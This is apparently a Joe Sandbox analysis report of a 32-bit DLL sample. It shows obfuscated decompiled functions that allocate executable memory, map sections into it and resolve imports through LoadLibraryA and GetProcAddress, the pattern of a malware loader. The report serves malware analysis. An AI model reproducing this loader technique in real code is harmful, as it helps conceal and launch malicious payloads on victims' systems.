DeleteCriticalSection 8084->8086 8088 6d504916 8084->8088 8095 6d515750 8085->8095 8086->8088 8088->8017 8090 6d515092 8089->8090 8091 6d514fd2 8089->8091 8092 6d514fe0 
8090->8092 8094 6d5150bb SNifCw242OCD 8090->8094 8091->8092 8093 6d515087 CloseHandle 8091->8093 8092->8029 8093->8092 8094->8092 8096 6d5157b0 8095->8096 8097 6d5157d4 GetProcessHeap 8096->8097 8100 6d5157cd ___scrt_fastfail 8096->8100 8098 6d51583f 8097->8098 8099 6d515868 RtlAllocateHeap 8098->8099 8098->8100 8099->8100 8100->8088 8102 6d513f17 8101->8102 8108 6d507850 8101->8108 8116 6d506b43 8102->8116 8105 6d513f56 8107 6d506b43 2 API calls 8105->8107 8106 6d513f7c 8106->8108 8120 6d516881 8106->8120 8107->8108 8108->7962 8108->7963 8108->7968 8111 6d502a11 8110->8111 8112 6d502a39 8110->8112 8113 6d506b43 2 API calls 8111->8113 8114 6d502a20 8112->8114 8115 6d502a6e ActivateActCtx 8112->8115 8113->8114 8114->7962 8115->8114 8115->8115 8117 6d506b63 GetProcessHeap 8116->8117 8118 6d506b7a 8116->8118 8117->8118 8119 6d506b70 RtlFreeHeap 8117->8119 8118->8105 8118->8106 8118->8108 8119->8118 8121 6d5168cf 8120->8121 8123 6d5168de 8120->8123 8122 6d506b43 2 API calls 8121->8122 8122->8123 8123->8106 8123->8123 8125 6d518ac6 8124->8125 8132 6d518ca5 8124->8132 8143 6d5050ec 8125->8143 8127 6d518bf1 VirtualAlloc 8129 6d518c2b ___scrt_fastfail 8127->8129 8128 6d518b3a 8128->8127 8128->8128 8130 6d518e09 8129->8130 8129->8132 8131 6d506bba LoadLibraryA 8130->8131 8133 6d518ea8 InitializeCriticalSection 8131->8133 8132->7973 8133->8132 8135 6d504610 8134->8135 8136 6d50467a 8134->8136 8149 6d505a34 8135->8149 8138 6d5046a1 OpenThread 8136->8138 8139 6d50462f 8136->8139 8138->8139 8139->7978 8139->8139 8141 6d506bfa LoadLibraryA 8140->8141 8142 6d506c2c 8140->8142 8141->8142 8142->7979 8142->8142 8144 6d505183 8143->8144 8147 6d5051a0 8143->8147 8145 6d506b43 2 API calls 8144->8145 8145->8147 8146 6d5051f7 8146->8128 8147->8146 8148 6d5151f2 11 API calls 8147->8148 8148->8146 8151 6d505e8e 8149->8151 8154 6d505a57 8149->8154 8150 6d505ae2 LoadLibraryA 8150->8154 8151->8139 8152 6d505dd0 GetProcAddress 8153 6d505da9 8152->8153 8152->8154 8153->8152 8153->8153 
8153->8154 8154->8150 8154->8151 8154->8152 8154->8153 8156 6d51518a 8155->8156 8157 6d51519f 8155->8157 8158 6d515750 2 API calls 8156->8158 8159 6d515195 8157->8159 8160 6d5151b2 CreateFileA 8157->8160 8158->8159 8159->7991 8160->8159 8160->8160 8167 6d5082b2 8169 6d5082be ___scrt_is_nonwritable_in_current_image 8167->8169 8168 6d5082e7 dllmain_raw 8171 6d508301 dllmain_crt_dispatch 8168->8171 8172 6d5082cd ___scrt_is_nonwritable_in_current_image 8168->8172 8169->8168 8170 6d5082e2 8169->8170 8169->8172 8181 6d514ed7 8170->8181 8171->8170 8171->8172 8174 6d508322 8175 6d50834e 8174->8175 8178 6d514ed7 2 API calls 8174->8178 8175->8172 8176 6d508357 dllmain_crt_dispatch 8175->8176 8176->8172 8177 6d50836a dllmain_raw 8176->8177 8179 6d50839c 8177->8179 8180 6d50833a dllmain_crt_dispatch dllmain_raw 8178->8180 8179->8172 8180->8175 8182 6d514ee4 GetProcessHeap HeapAlloc 8181->8182 8183 6d514f28 ___scrt_fastfail 8181->8183 8182->8183 8183->8174 8185 6d508123 8186 6d50812f ___scrt_is_nonwritable_in_current_image 8185->8186 8205 6d50853c 8186->8205 8188 6d508136 8189 6d50813b ___scrt_is_nonwritable_in_current_image 8188->8189 8190 6d508163 8188->8190 8216 6d50880e IsProcessorFeaturePresent 8188->8216 8220 6d50849f 8190->8220 8193 6d508172 __RTC_Initialize 8193->8189 8223 6d508716 8193->8223 8197 6d50818a 8198 6d508716 29 API calls 8197->8198 8199 6d508196 ___scrt_initialize_default_local_stdio_options 8198->8199 8227 6d50a322 8199->8227 8203 6d5081b7 8203->8189 8235 6d50a2c6 8203->8235 8206 6d508545 8205->8206 8239 6d5089eb IsProcessorFeaturePresent 8206->8239 8210 6d508556 8215 6d50855a 8210->8215 8250 6d50b379 8210->8250 8213 6d508571 8213->8188 8215->8188 8217 6d508824 ___scrt_fastfail 8216->8217 8218 6d5088cc IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8217->8218 8219 6d508916 8218->8219 8219->8190 8313 6d508575 8220->8313 8222 6d5084a6 8222->8193 8318 6d5086db 8223->8318 8226 6d5087c7 InitializeSListHead 8226->8197 8230 6d50a339 
8227->8230 8228 6d508b95 _ValidateLocalCookies 5 API calls 8229 6d5081ac 8228->8229 8229->8189 8231 6d508474 8229->8231 8230->8228 8232 6d508479 ___scrt_release_startup_lock 8231->8232 8233 6d5089eb ___isa_available_init IsProcessorFeaturePresent 8232->8233 8234 6d508482 8232->8234 8233->8234 8234->8203 8236 6d50a2f5 8235->8236 8237 6d508b95 _ValidateLocalCookies 5 API calls 8236->8237 8238 6d50a31e 8237->8238 8238->8189 8240 6d508551 8239->8240 8241 6d509556 8240->8241 8242 6d50955b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 8241->8242 8261 6d509871 8242->8261 8246 6d509571 8247 6d50957c 8246->8247 8275 6d5098ad 8246->8275 8247->8210 8249 6d509569 8249->8210 8298 6d50e35c 8250->8298 8253 6d509595 8254 6d5095af 8253->8254 8255 6d50959e 8253->8255 8254->8215 8256 6d509856 ___vcrt_uninitialize_ptd 6 API calls 8255->8256 8257 6d5095a3 8256->8257 8258 6d5098ad ___vcrt_uninitialize_locks DeleteCriticalSection 8257->8258 8259 6d5095a8 8258->8259 8309 6d509b85 8259->8309 8262 6d50987a 8261->8262 8264 6d5098a3 8262->8264 8266 6d509565 8262->8266 8279 6d509b05 8262->8279 8265 6d5098ad ___vcrt_uninitialize_locks DeleteCriticalSection 8264->8265 8265->8266 8266->8249 8267 6d509823 8266->8267 8284 6d509a1a 8267->8284 8269 6d50982d 8270 6d509838 8269->8270 8271 6d509ac8 ___vcrt_FlsSetValue 6 API calls 8269->8271 8270->8246 8272 6d509846 8271->8272 8273 6d509853 8272->8273 8289 6d509856 8272->8289 8273->8246 8276 6d5098d7 8275->8276 8277 6d5098b8 8275->8277 8276->8249 8278 6d5098c2 DeleteCriticalSection 8277->8278 8278->8276 8278->8278 8280 6d5098f9 try_get_function 5 API calls 8279->8280 8281 6d509b1f 8280->8281 8282 6d509b3c InitializeCriticalSectionAndSpinCount 8281->8282 8283 6d509b28 8281->8283 8282->8283 8283->8262 8285 6d5098f9 try_get_function 5 API calls 8284->8285 8286 6d509a34 8285->8286 8287 6d509a4c TlsAlloc 8286->8287 8288 6d509a3d 8286->8288 8288->8269 8290 6d509860 8289->8290 8291 6d509866 8289->8291 8293 6d509a54 8290->8293 
8291->8270 8294 6d5098f9 try_get_function 5 API calls 8293->8294 8295 6d509a6e 8294->8295 8296 6d509a85 TlsFree 8295->8296 8297 6d509a7a 8295->8297 8296->8297 8297->8291 8300 6d50e375 8298->8300 8302 6d50e379 8298->8302 8299 6d508b95 _ValidateLocalCookies 5 API calls 8301 6d508563 8299->8301 8300->8299 8301->8213 8301->8253 8302->8300 8304 6d50e224 8302->8304 8305 6d50e22b 8304->8305 8306 6d50e26e GetStdHandle 8305->8306 8307 6d50e2d6 8305->8307 8308 6d50e281 GetFileType 8305->8308 8306->8305 8307->8302 8308->8305 8310 6d509bb4 8309->8310 8311 6d509b8e 8309->8311 8310->8254 8311->8310 8312 6d509b9e FreeLibrary 8311->8312 8312->8311 8314 6d508583 8313->8314 8317 6d508588 ___scrt_initialize_onexit_tables ___scrt_release_startup_lock 8313->8317 8315 6d50880e ___scrt_fastfail 4 API calls 8314->8315 8314->8317 8316 6d50860b 8315->8316 8317->8222 8319 6d5086f8 8318->8319 8320 6d5086ff 8318->8320 8324 6d50b1f1 8319->8324 8327 6d50b261 8320->8327 8323 6d508185 8323->8226 8325 6d50b261 __onexit 29 API calls 8324->8325 8326 6d50b203 8325->8326 8326->8323 8330 6d50af49 8327->8330 8333 6d50ae7f 8330->8333 8332 6d50af6d 8332->8323 8334 6d50ae8b ___scrt_is_nonwritable_in_current_image 8333->8334 8341 6d50c2f6 EnterCriticalSection 8334->8341 8336 6d50ae99 8342 6d50b0b0 8336->8342 8338 6d50aea6 8352 6d50aec4 8338->8352 8340 6d50aeb7 ___scrt_is_nonwritable_in_current_image 8340->8332 8341->8336 8343 6d50b0ce 8342->8343 8346 6d50b0c6 __onexit __crt_fast_encode_pointer 8342->8346 8344 6d50b127 8343->8344 8343->8346 8355 6d50e0db 8343->8355 8344->8346 8347 6d50e0db __onexit 29 API calls 8344->8347 8346->8338 8349 6d50b13d 8347->8349 8348 6d50b11d 8350 6d50b3fe __freea 20 API calls 8348->8350 8351 6d50b3fe __freea 20 API calls 8349->8351 8350->8344 8351->8346 8404 6d50c33e LeaveCriticalSection 8352->8404 8354 6d50aece 8354->8340 8356 6d50e0e6 8355->8356 8357 6d50e10e 8356->8357 8359 6d50e0ff 8356->8359 8358 6d50e11d 8357->8358 8364 6d510768 8357->8364 8371 6d51079b 8358->8371 8361 
6d50bf62 __dosmaperr 20 API calls 8359->8361 8363 6d50e104 ___scrt_fastfail 8361->8363 8363->8348 8365 6d510773 8364->8365 8366 6d510788 HeapSize 8364->8366 8367 6d50bf62 __dosmaperr 20 API calls 8365->8367 8366->8358 8368 6d510778 8367->8368 8383 6d50bea6 8368->8383 8372 6d5107b3 8371->8372 8373 6d5107a8 8371->8373 8374 6d5107bb 8372->8374 8382 6d5107c4 _abort 8372->8382 8397 6d50b438 8373->8397 8376 6d50b3fe __freea 20 API calls 8374->8376 8379 6d5107b0 8376->8379 8377 6d5107c9 8380 6d50bf62 __dosmaperr 20 API calls 8377->8380 8378 6d5107ee HeapReAlloc 8378->8379 8378->8382 8379->8363 8380->8379 8381 6d50e440 _abort 7 API calls 8381->8382 8382->8377 8382->8378 8382->8381 8386 6d50be2b 8383->8386 8385 6d50beb2 8385->8358 8387 6d50c8d8 _abort 20 API calls 8386->8387 8388 6d50be41 8387->8388 8389 6d50bea0 8388->8389 8390 6d50be4f 8388->8390 8391 6d50beb6 _abort 11 API calls 8389->8391 8395 6d508b95 _ValidateLocalCookies 5 API calls 8390->8395 8392 6d50bea5 8391->8392 8393 6d50be2b _abort 26 API calls 8392->8393 8394 6d50beb2 8393->8394 8394->8385 8396 6d50be76 8395->8396 8396->8385 8398 6d50b476 8397->8398 8402 6d50b446 _abort 8397->8402 8399 6d50bf62 __dosmaperr 20 API calls 8398->8399 8401 6d50b474 8399->8401 8400 6d50b461 HeapAlloc 8400->8401 8400->8402 8401->8379 8402->8398 8402->8400 8403 6d50e440 _abort 7 API calls 8402->8403 8403->8402 8404->8354

            Control-flow Graph

            C-Code - Quality: 100%
            			E6D515750() {
            				void* __edi;
            				signed char _t69;
            				void* _t79;
            				void* _t80;
            				signed int _t94;
            				signed int _t95;
            				signed int _t98;
            				void* _t102;
            				void* _t104;
            				signed int _t113;
            				void* _t114;
            				signed int _t115;
            				long _t116;
            				signed int _t118;
            				intOrPtr* _t119;
            				intOrPtr _t120;
            				void* _t122;
            				void* _t123;
            
            				_t94 =  *(_t123 + 0xc) & 0x0000ffff;
            				_t119 =  *((intOrPtr*)(_t123 + 0x10));
            				_t113 = _t94 ^ 0x000029d1;
            				 *(_t119 + 0x48) =  *((intOrPtr*)(_t119 + 0x4c)) - 0x260d;
            				 *((intOrPtr*)( *((intOrPtr*)(_t119 + 0x74)) + 0x168)) =  *((intOrPtr*)( *((intOrPtr*)(_t119 + 0x74)) + 0x168)) + 0xffffff28 - _t119;
            				_t120 =  *((intOrPtr*)(_t119 + 0x74));
            				_t116 =  *(_t119 + 0x8c);
            				 *(_t119 + 0x190) = _t113;
            				 *(_t119 + 0x90) =  *( *((intOrPtr*)(_t119 + 0x50)) + 0xc4) * 0x29b2;
            				_t98 =  *(_t120 + 0x80) ^ 0x00000b8b;
            				while(_t98 <= ( *(_t120 + 0x1c) ^ 0x00000322)) {
            					_t113 = _t113 + 0x252e;
            					_t98 = _t98 + 1;
            					 *(_t119 + 0x190) = _t113;
            				}
            				if(_t116 != 0) {
            					_t122 =  *((intOrPtr*)( *((intOrPtr*)(_t119 + 0x124)) + 0x1c)) - 0x260d;
            					 *( *((intOrPtr*)(_t119 + 0x88)) + 0x130) =  *( *((intOrPtr*)(_t119 + 0x88)) + 0x130) |  *(_t119 + 0xd0) ^ 0x00002ea5;
            					_t69 = M6D53866A; // 0x6f
            					 *(_t119 + 0x24) =  *(_t119 + 0x24) | _t94 | _t69 & 0x000000ff;
            					_t114 = GetProcessHeap();
            					_t102 = 0x1df3;
            					 *((intOrPtr*)( *((intOrPtr*)(_t119 + 0x88)) + 0x148)) = 0x5b49c1e;
            					 *(_t119 + 0x168) =  *(_t119 + 0x168) & 0x00000000;
            					if(( *( *((intOrPtr*)(_t119 + 0x124)) + 0x2c) ^ 0x00003586) == 0x1df3) {
            						L9:
            						if(_t114 != 0) {
            							_t80 = RtlAllocateHeap(_t114, 0, _t116); // executed
            							_t122 = _t80;
            							if( *((intOrPtr*)(_t119 + 0x130)) >  *((intOrPtr*)( *((intOrPtr*)(_t119 + 0x74)) + 0x4c)) + 0x3c4) {
            								 *(_t119 + 0x48) =  *(_t119 + 0x48) ^  *((intOrPtr*)( *((intOrPtr*)(_t119 + 0x1d4)) + 0xf8)) - _t94;
            							}
            							 *((intOrPtr*)( *(_t119 + 8) + 0x180)) =  *((intOrPtr*)( *(_t119 + 8) + 0x180)) - ( *(_t119 + 0xd8) ^ _t94);
            							 *( *((intOrPtr*)(_t119 + 0x124)) + 0x3c) =  *( *((intOrPtr*)(_t119 + 0x124)) + 0x3c) ^ 0xfffffab9;
            							E6D509250(_t116, _t122,  *((intOrPtr*)( *((intOrPtr*)(_t119 + 0x50)) + 0x1c)) - 0x260d, _t116);
            						}
            						_t104 =  *((intOrPtr*)( *((intOrPtr*)(_t119 + 0x10)) + 0x4c)) - 0x76;
            						if(_t104 >= 0x2597) {
            							L17:
            							return _t122;
            						} else {
            							_t115 =  *(_t119 + 0xd8);
            							_t118 =  *(_t119 + 8) * _t94;
            							_t79 = 0x2597 - _t104;
            							do {
            								_t115 = _t115 ^ _t118;
            								_t79 = _t79 - 1;
            							} while (_t79 != 0);
            							 *(_t119 + 0xd8) = _t115;
            							goto L17;
            						}
            					}
            					_t95 = _t94 - 0x252e;
            					do {
            						 *( *_t119 + 0x30) =  *( *_t119 + 0x30) | _t95;
            						_t102 = _t102 + 1;
            					} while (_t102 != ( *( *((intOrPtr*)(_t119 + 0x124)) + 0x2c) ^ 0x00003586));
            					_t94 =  *(_t123 + 0x18) & 0x0000ffff;
            					goto L9;
            				}
            				return 0;
            			}


            APIs
            • GetProcessHeap.KERNEL32(?,?,?,?,6D5045B2,?,00002EA5,?,?,6D51A749,?,?,?,0000074E,?,000003A9), ref: 6D515809
            • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 6D51586C
            Strings
            • oach pursuit visits funny assume sadness haul probably sketch sparrow troublesome potatoes milk distracted tremble rage varying concession wit banged profit odour startle procession admired armour projects charm insane reproof inject drugstore trout parlor hop, xrefs: 6D5157FC
            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID: Heap$AllocateProcess
            • String ID: oach pursuit visits funny assume sadness haul probably sketch sparrow troublesome potatoes milk distracted tremble rage varying concession wit banged profit odour startle procession admired armour projects charm insane reproof inject drugstore trout parlor hop
            • API String ID: 1357844191-1397620714
            • Opcode ID: e00f12af5fed268d3a4ac25c7ad6283c421d3d24404282c3933b491f486a7b50
            • Instruction ID: 3bd6a178568c2d6294888b88cf8e613908255cec89ac3f85d2395a9daef9d129
            • Opcode Fuzzy Hash: e00f12af5fed268d3a4ac25c7ad6283c421d3d24404282c3933b491f486a7b50
            • Instruction Fuzzy Hash: FA513A356047018FD768CF39C894AA6B7F1FF48311F11896EE5AACBB91DB31A805CB10
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 80%
            			E6D518A58() {
            				void* __edi;
            				signed int _t211;
            				long _t221;
            				void* _t222;
            				intOrPtr _t250;
            				signed int _t280;
            				void* _t296;
            				intOrPtr _t298;
            				signed int _t299;
            				intOrPtr _t303;
            				void* _t305;
            				signed int _t306;
            				intOrPtr _t307;
            				intOrPtr _t308;
            				intOrPtr _t313;
            				intOrPtr _t315;
            				void* _t332;
            				signed int _t339;
            				signed int _t340;
            				signed int _t341;
            				signed int _t342;
            				void* _t343;
            				signed int _t344;
            				signed short _t349;
            				signed int _t350;
            				void* _t354;
            				signed int _t356;
            				signed int _t359;
            				signed int _t363;
            				signed int _t366;
            				signed int* _t368;
            				signed int _t372;
            				signed int _t374;
            				signed int _t382;
            				signed int _t383;
            				signed int _t385;
            				void* _t386;
            				void* _t387;
            
            				_t307 =  *((intOrPtr*)(_t386 + 0x28));
            				_t341 =  *(_t386 + 0x30);
            				_t298 =  *((intOrPtr*)(_t386 + 0x38)) + 0xfffff9cd;
            				 *(_t386 + 0xc) = _t307 - 0x484;
            				 *((intOrPtr*)(_t386 + 4)) = _t341 + 0xc8a;
            				 *((intOrPtr*)(_t386 + 0x3c)) = _t298;
            				_t374 = _t307 - 0xb37;
            				 *(_t386 + 0x30) =  *(_t386 + 0x40) + 0xfffffb4a;
            				_t308 =  *((intOrPtr*)(_t386 + 0x28));
            				 *(_t386 + 0xc) = _t374;
            				 *(_t386 + 0x44) = _t308 - 0x29b2;
            				 *((intOrPtr*)(_t386 + 0x28)) = _t341 + 0x71f;
            				if( *(_t386 + 0x30) == _t341 + 0xbc5) {
            					L33:
            					return  *(_t386 + 0x30) + 0xfffffbdc;
            				}
            				_t368 =  *(_t386 + 0x2c);
            				_t359 =  *(_t386 + 0x24) + 0xffffff3b;
            				_push(_t359 - 0xe2);
            				_push(_t374);
            				_push(_t359 - 0xbc5);
            				_push(_t374 + 0xb56);
            				_push(_t368);
            				_push(_t298 + 0x241);
            				_push(_t359 + 0x10);
            				_t342 =  *(_t386 + 0x4c);
            				_push(_t341 + 0x640);
            				_push(_t308);
            				_push(_t374 - 0x88);
            				_push(_t359 - 0x8ca);
            				_push(_t342 + 0x3a5);
            				_push(_t308 - 0x10e);
            				_push(_t342 + 0x4b6);
            				_push(_t359 + 0x3f2);
            				_push(_t374 + 0x71c);
            				_t299 = E6D5050EC();
            				_t387 = _t386 + 0x40;
            				 *(_t387 + 0x40) = _t299;
            				_t368[0x15] =  *((intOrPtr*)(_t368[0x11] + 6));
            				_t211 = _t368[7] ^ 0x000007e6;
            				_t313 =  *((intOrPtr*)(_t368[0x49] + 0x80)) - 0xcbc;
            				 *((intOrPtr*)(_t387 + 0x24)) = _t313;
            				if(_t313 == _t211) {
            					L5:
            					_t343 = 0x24ad;
            					_t368[0x1b] = _t368[0x11] + 0xf8;
            					_t368[0x24] = _t368[0x24] * 0x5494;
            					if(( *(_t368[0x14] + 0x1c) ^ 0x000002a0) == 0x24ad) {
            						L9:
            						 *((intOrPtr*)(_t387 + 0x4c)) =  *((intOrPtr*)(_t387 + 0x4c)) + 0x252e;
            						_t221 =  *((intOrPtr*)(_t368[0x11] + 0x50)) + 0x00000fff & 0xfffff000;
            						_t368[0x30] = _t221;
            						_t222 = VirtualAlloc(0, _t221, 0x3000, 0x40); // executed
            						_t368[0x10] = _t222;
            						if(_t368[0x1d] >= 0x2597) {
            							 *((intOrPtr*)(_t368[4] + 0x90)) =  *((intOrPtr*)( *_t368 + 0x168)) - 0x1eee;
            						}
            						_t368[0xe] = _t368[0xa] - 0x2749;
            						_t368[0x34] = _t368[0x34] + 0x21e9 - _t368[0x22];
            						E6D509250(_t359, _t368[0x10], 0, _t368[0x30]);
            						E6D508CD0(_t368[0x10], _t368[8],  *((intOrPtr*)(_t368[0x11] + 0x54)));
            						_t386 = _t387 + 0x18;
            						_t344 =  *(_t386 + 0x44);
            						if(_t344 <=  *((intOrPtr*)(_t387 + 0x28)) + 0xfffff303) {
            							L32:
            							goto L33;
            						} else {
            							_t84 = _t299 - 0x7e8; // -2024
            							if(_t344 <= _t84) {
            								if(_t368[0x1d] < (_t368[0x4f] * _t368[0xe] & _t374)) {
            									_t315 =  *((intOrPtr*)(_t386 + 0x18));
            									if(_t315 != (_t368[0x19] ^ _t359) && _t315 > _t299 *  *(_t386 + 0x10)) {
            										_t368[0x24] = _t368[0x24] ^ _t368[0x22] + 0x000029d1;
            									}
            								} else {
            									_t368[0x56] = _t368[0x56] - _t368[0x18] +  *((intOrPtr*)(_t386 + 0x18));
            									 *(_t386 + 0x24) =  *_t368 | 0x00002749;
            									_push(( *(_t386 + 0x2c))[0x5a] *  *(_t386 + 0x40) &  *(_t386 + 0x40));
            									_t303 =  *((intOrPtr*)(_t386 + 0x48));
            									_t250 = E6D506BBA(_t303,  *(_t386 + 0x30), _t368[0x13] + _t368[9], _t368[0x36] + _t344, 0xffffb260 - _t368[0x4c], ( *(_t386 + 0x2c))[0x45] * _t368[0x4c] | _t368[0x4c],  *((intOrPtr*)(_t386 + 0x38)) - ( *(_t386 + 0x2c))[0x75] ^  *(_t386 + 0x4c), ( *_t368 *  *(_t386 + 0x44) ^  *(_t386 + 0x44)) * (( *(_t386 + 0x2c))[0xf] + 0x2872) *  *(_t386 + 0x10) * 0xffffb260);
            									_t386 = _t386 + 0x24;
            									_t382 =  *(_t386 + 0x40);
            									_t349 =  *(_t303 + 0x1d4) & 0x0000ffff;
            									_t363 =  *(_t386 + 0x30);
            									_t372 =  *(_t386 + 0x14);
            									_push( *((intOrPtr*)(_t303 + 0x100)) - _t382);
            									 *((intOrPtr*)(_t386 + 0x3c)) = _t250;
            									_push( *(_t303 + 0x13c) & _t349 & 0x0000ffff);
            									_push( *((intOrPtr*)(_t386 + 0x54)) + 0x2749);
            									_push(_t363 - 0x0000252e & _t382);
            									_push(_t349 - 0x4da0);
            									InitializeCriticalSection(_t372 ^ 0x000024ad);
            									 *((intOrPtr*)(_t303 + 0x124)) = 0xffffd370;
            									 *(_t303 + 0x48) =  *(_t303 + 0x48) ^ _t372 & 0x00002201;
            									 *((intOrPtr*)(_t303 + 0x1c)) =  *((intOrPtr*)(_t303 + 0x1c)) + (_t372 - 0x00002ab3 &  *(_t386 + 0x44));
            									 *((intOrPtr*)(_t303 + 0x3c)) =  *((intOrPtr*)(_t303 + 0x3c)) - _t363 * _t382;
            								}
            								goto L32;
            							}
            							_t366 =  *(_t368[0x75] + 0x80) ^ 0x00002ea5;
            							while(_t366 < (_t368[0x15] & 0x0000ffff)) {
            								_t383 =  *_t368;
            								_t350 = _t368[0x1b];
            								_t305 =  *(_t383 + 0x1c) * _t366 * 0x4cafdec8 + _t350;
            								if(( !( *((intOrPtr*)(_t368[0x11] + 0x3c)) - 1) &  *((intOrPtr*)(_t350 + 0x10)) - 0x00000001 +  *((intOrPtr*)(_t368[0x11] + 0x3c))) == 0 ||  *((intOrPtr*)(_t305 + 0x14)) == 0 ||  *((intOrPtr*)(_t305 + 0x10)) == 0) {
            									L24:
            									_t366 = _t366 + 1;
            									continue;
            								} else {
            									 *((intOrPtr*)(_t368[0x49] + 0x28)) =  *((intOrPtr*)(_t368[0x49] + 0x28)) + 0xffffe185 -  *((intOrPtr*)(_t383 + 0xd0));
            									if( *(_t368[0x75] + 0x80) - 0x32d < _t368[0x5e]) {
            										_t368[0x60] = _t368[0x60] | _t368[9] * 0x0000252e;
            									}
            									_t354 = 0x29b2;
            									if(( *(_t368[0x22] + 0x1c) ^ 0x00000fb9) == 0x29b2) {
            										L21:
            										E6D508CD0( *((intOrPtr*)(_t305 + 0xc)) + _t368[0x10],  *((intOrPtr*)(_t305 + 0x14)) + _t368[8],  *((intOrPtr*)(_t305 + 0x10)));
            										_t280 = _t368[0x24];
            										_t386 = _t386 + 0xc;
            										_t332 = 3;
            										do {
            											_t280 = _t280 * 0x29b3;
            											_t332 = _t332 - 1;
            										} while (_t332 != 0);
            										_t368[0x24] = _t280;
            										_t368[9] =  &(_t368[0x35]) * _t368[9];
            										 *((intOrPtr*)(_t368[0x1d] + 0x90)) = _t368[0x4f] - 0x24ad;
            										goto L24;
            									} else {
            										do {
            											_t354 = _t354 + 1;
            											 *(_t368[0x14] + 0x90) = _t368[0x69] | 0x000029b2;
            										} while (_t354 != ( *(_t368[0x22] + 0x1c) ^ 0x00000fb9));
            										goto L21;
            									}
            								}
            							}
            							 *((intOrPtr*)(_t368[0x49] + 0x24)) =  *((intOrPtr*)(_t368[0x49] + 0x24)) +  *((intOrPtr*)(_t368[0x75] + 0x168)) - 0x1e7b;
            							goto L32;
            						}
            					}
            					_t306 = _t368[0x2f] * 0x260d;
            					_t339 = _t368[0x39];
            					_t385 = _t368[0x14];
            					do {
            						_t339 = _t339 ^ _t306;
            						_t343 = _t343 + 1;
            						_t368[0x39] = _t339;
            					} while (_t343 != ( *(_t385 + 0x1c) ^ 0x000002a0));
            					_t299 =  *(_t387 + 0x40);
            					_t374 =  *(_t387 + 0x14);
            					goto L9;
            				} else {
            					_t340 = _t368[0x4c];
            					_t356 = _t368[2] ^ 0x00002872;
            					_t296 = _t211 -  *((intOrPtr*)(_t387 + 0x24));
            					do {
            						_t340 = _t340 + _t356;
            						_t296 = _t296 - 1;
            					} while (_t296 != 0);
            					_t368[0x4c] = _t340;
            					goto L5;
            				}
            			}

            APIs
            • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 6D518C19
              • Part of subcall function 6D506BBA: LoadLibraryA.KERNEL32(?,?,?,?,?,6D502E8B,?,?,?,?,?,?,?,?,?,?), ref: 6D506C04
            • InitializeCriticalSection.KERNEL32(?,?,?,?,?,?), ref: 6D518EFC
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID: AllocCriticalInitializeLibraryLoadSectionVirtual
            • String ID: .%
            • API String ID: 485185432-31117204
            • Opcode ID: 16ffec23eec426799c00ab9f6824433f2cffe1da31990c24cdaf012809271147
            • Instruction ID: 6a74e3a7684b45281df08fdef07ccf0abe93fc0b371ee74bb2a2e449667a4166
            • Opcode Fuzzy Hash: 16ffec23eec426799c00ab9f6824433f2cffe1da31990c24cdaf012809271147
            • Instruction Fuzzy Hash: 67E126716047059FD328CF28C985AABB7F9FF88304F044A6EEA9A8B651D734F944CB51
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E6D505A34() {
            				struct HINSTANCE__* _t181;
            				void* _t207;
            				void* _t217;
            				void* _t226;
            				void* _t229;
            				signed int _t230;
            				void* _t236;
            				signed int _t248;
            				signed int _t253;
            				signed short* _t258;
            				signed short* _t259;
            				void* _t261;
            				struct HINSTANCE__* _t262;
            				intOrPtr _t263;
            				signed int _t264;
            				signed int _t265;
            				signed int _t268;
            				intOrPtr _t270;
            				intOrPtr _t274;
            				intOrPtr _t275;
            				signed int _t276;
            				signed int _t280;
            				void* _t284;
            				intOrPtr _t286;
            				void* _t288;
            				void* _t291;
            				signed int _t293;
            				signed int _t294;
            				void* _t296;
            				signed int _t297;
            				void* _t298;
            				void* _t299;
            				signed int _t300;
            				void* _t301;
            				void* _t302;
            				signed int _t304;
            				void* _t305;
            				intOrPtr _t307;
            				signed int _t308;
            				signed int _t309;
            				signed int _t311;
            				intOrPtr _t313;
            				struct HINSTANCE__* _t314;
            				intOrPtr _t316;
            				intOrPtr _t317;
            				struct HINSTANCE__* _t318;
            				void* _t320;
            				signed int _t321;
            				intOrPtr _t323;
            				signed int _t326;
            				intOrPtr* _t327;
            				intOrPtr* _t331;
            				signed short* _t333;
            				void* _t335;
            
            				_t327 =  *((intOrPtr*)(_t335 + 0x14));
            				if( *((intOrPtr*)( *( *((intOrPtr*)(_t327 + 0x74)) + 0x80) * 0x46204968 +  *((intOrPtr*)(_t327 + 0x70)) + 0x78)) == 0) {
            					L60:
